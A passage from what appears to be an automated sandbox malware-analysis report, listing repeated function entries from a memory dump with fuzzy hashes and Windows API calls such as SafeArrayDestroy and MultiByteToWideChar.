Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 86d67db35d083a29e2a98ac5b4bf58fbc0d28568d5b0d4e5ed1292c36f811376
Instruction ID: 73e15b7d9a226e30f04a910622ed15ff97b0a34d0541e955ccf946271642f844
Opcode Fuzzy Hash: 86d67db35d083a29e2a98ac5b4bf58fbc0d28568d5b0d4e5ed1292c36f811376
Instruction Fuzzy Hash: 20415B70B016189FDB00CFA9CC90B9EB7F9AF89604F60869AE518EB751DB31E941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08CE7 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5c589f1ca26b1ae12e7c210cffada07943b7165db63a03ce529257cfbda05a24
Instruction ID: e1086b56f07d56cf20b6a101b038930b44d29bf125bd70c4b59b7e244d4aee71
Opcode Fuzzy Hash: 5c589f1ca26b1ae12e7c210cffada07943b7165db63a03ce529257cfbda05a24
Instruction Fuzzy Hash: E7315A70F016089FCB00CF69CC90B9EB7F9AF89604F208696E418EB651DB71E940DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08F83 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 631a74a08c24905d24d66bc832bbfa8b0fc9550858fb4068e294acce91e30f7a
Instruction ID: 3f0685b90756b11c917687c0f9031840bde91778b1575dbf6006c971aef1d7e5
Opcode Fuzzy Hash: 631a74a08c24905d24d66bc832bbfa8b0fc9550858fb4068e294acce91e30f7a
Instruction Fuzzy Hash: 5B313970F016089FCB10CFA9CC90B9EB7FAAF89604F60858AE418EB651DB75E941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08BDD Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: b0e2bcbc105d2b6d2dd435d913173e9e17b576500330dee1089a3c4635c80cb6
Instruction ID: 48a0eb85de8550ec8a859fcd1f454ad46078e4b99d73763c60fd4f2d2e80d41c
Opcode Fuzzy Hash: b0e2bcbc105d2b6d2dd435d913173e9e17b576500330dee1089a3c4635c80cb6
Instruction Fuzzy Hash: 11314870F016089FCB10CF69CC90B9EBBF9AF89604F20858AE418E7652DB71E981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF004D3 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0240F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 631a74a08c24905d24d66bc832bbfa8b0fc9550858fb4068e294acce91e30f7a
Instruction ID: 26dfb3be90b51801e7221a708d4617066d7639fc98cbcff00908c5ff1b930604
Opcode Fuzzy Hash: 631a74a08c24905d24d66bc832bbfa8b0fc9550858fb4068e294acce91e30f7a
Instruction Fuzzy Hash: 9A315C74F016089FCB00CFA9CC94BAEB7B9AF89704F30858AE518E7652DB71D9419F60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF005DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0240F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 70f3e7f36cfe840f846b5ced44c1eb41ffcd72819db59500cdac7a948431cc35
Instruction ID: eac5ca466ef91044d34e34b532ba387664b05144c647ef6b85abcb097d2ea339
Opcode Fuzzy Hash: 70f3e7f36cfe840f846b5ced44c1eb41ffcd72819db59500cdac7a948431cc35
Instruction Fuzzy Hash: E5316BB0F016089FCB00CF68CD90B5EB7B9AF88704F20859AE418E7641DB71D940DF60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 85ad798cf9b504ab709f535a12d7f81b5b2873491b4b15c28eb9cdf749190773
Instruction ID: 18c6f5fdb99b81a072db7c5fd5ccc406e41fac7daee996383fb7b834a2977958
Opcode Fuzzy Hash: 85ad798cf9b504ab709f535a12d7f81b5b2873491b4b15c28eb9cdf749190773
Instruction Fuzzy Hash: 73315A70F016189FDB10DB69CC90B9EB7F9AF85604F24869AE419E7642C771ED80DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: a23353ae89fb2296e9564cadc268aa4750c498c813209daf8f76bb30fca03185
Instruction ID: 4587e36e0f6e20314bfd7639207a7b297748adc5e6b6a401a3ea26c6967f9402
Opcode Fuzzy Hash: a23353ae89fb2296e9564cadc268aa4750c498c813209daf8f76bb30fca03185
Instruction Fuzzy Hash: 76315870F016189FCB10CBA9CC90B9EB7F9AF89704F20868AE419E7641DB71E981DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: d3eeba478ef3ad34788573fc99e92c0203b84fe630de2ba398534d917f197334
Instruction ID: 30a867b5695490b8d62a0687b0869b488195f5d07657c3762c96c4c02a935a5a
Opcode Fuzzy Hash: d3eeba478ef3ad34788573fc99e92c0203b84fe630de2ba398534d917f197334
Instruction Fuzzy Hash: A6315A70F016189FCB10CFA9CC90B9EB7F9AF89604F20868AE418E7645CB71E940DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: fc85e0ca9fec9a6cc924b50522be78c6063bbcc810133bc6435dc7abb611d20b
Instruction ID: 70bfd3fb40fa101843fdb9544dd1545657fd35f450e7cd35b58e6c9639f9156f
Opcode Fuzzy Hash: fc85e0ca9fec9a6cc924b50522be78c6063bbcc810133bc6435dc7abb611d20b
Instruction Fuzzy Hash: 56314770F016189FCB10CBA9CC90B9EB7FAAF89704F24869AE419E7642C771E940DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF0884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: bf0eaa548a98c895c950401f59bc7592dfa8152feb0c5874f8a929c0887e907d
Instruction ID: 53529e28517472533edf7b28d49399c4d0a28098659eb9c70576b16f6d83aa5c
Opcode Fuzzy Hash: bf0eaa548a98c895c950401f59bc7592dfa8152feb0c5874f8a929c0887e907d
Instruction Fuzzy Hash: 4F313870F016189FDB10CBA9CC90B9EF7FAAF89604F24868AE419E7641D771E941DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF08B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0AEBF

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 15e0010a25355c8bbc23fc76cd0ac44cc3ef75f8615d6dfc3ea7531ab35dba30
Instruction ID: 52a3c191df2dcf614716747b913b2f23b3e82e5cb18a768c9576e26b32f7f168
Opcode Fuzzy Hash: 15e0010a25355c8bbc23fc76cd0ac44cc3ef75f8615d6dfc3ea7531ab35dba30
Instruction Fuzzy Hash: B5316AB0F016189FCB10CBA9CC90B9EB7F9AF89604F24868AE418E7641CB71ED41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6CF00561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6CF023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6CF023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6CF0240F

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943623695.000000006CF8E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_6cee0000_pip.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 62c13c5613dee569e1323d2701b9d8524abb5c50e31ea139adb797435e0a986f
Instruction ID: 76467c5cdaae8c701fb00255acd1f945f5b726a42f28988fec25c7ccbc5c9aa6
Opcode Fuzzy Hash: 62c13c5613dee569e1323d2701b9d8524abb5c50e31ea139adb797435e0a986f
Instruction Fuzzy Hash: C5314BB0F016189FCB10CFA9CC94B9DB7B9AF89604F70858AE518E7642C772D9809F60

Uniqueness

Uniqueness Score: -1.00%

Function 6CF5249C Relevance: 9.1, APIs: 6, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000100,?,?,?,?,?,6CF525B1,?,00000000,?), ref: 6CF524E6
_malloc.LIBCMT ref: 6CF5251B
_memset.LIBCMT ref: 6CF5253B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000,00000001,00000000), ref: 6CF52550
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CF5255E
__freea.LIBCMT ref: 6CF52568

Memory Dump Source

Source File: 00000016.00000002.2942134299.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true

Associated: 00000016.00000002.2942102279.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2942966525.000000006CF64000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943187513.000000006CF7E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943253403.000000006CF80000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943306873.000000006CF81000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943359638.000000006CF83000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2943419468.000000006CF8A000.00000004.00000001.01000000.0000000A.sdmpDownload File
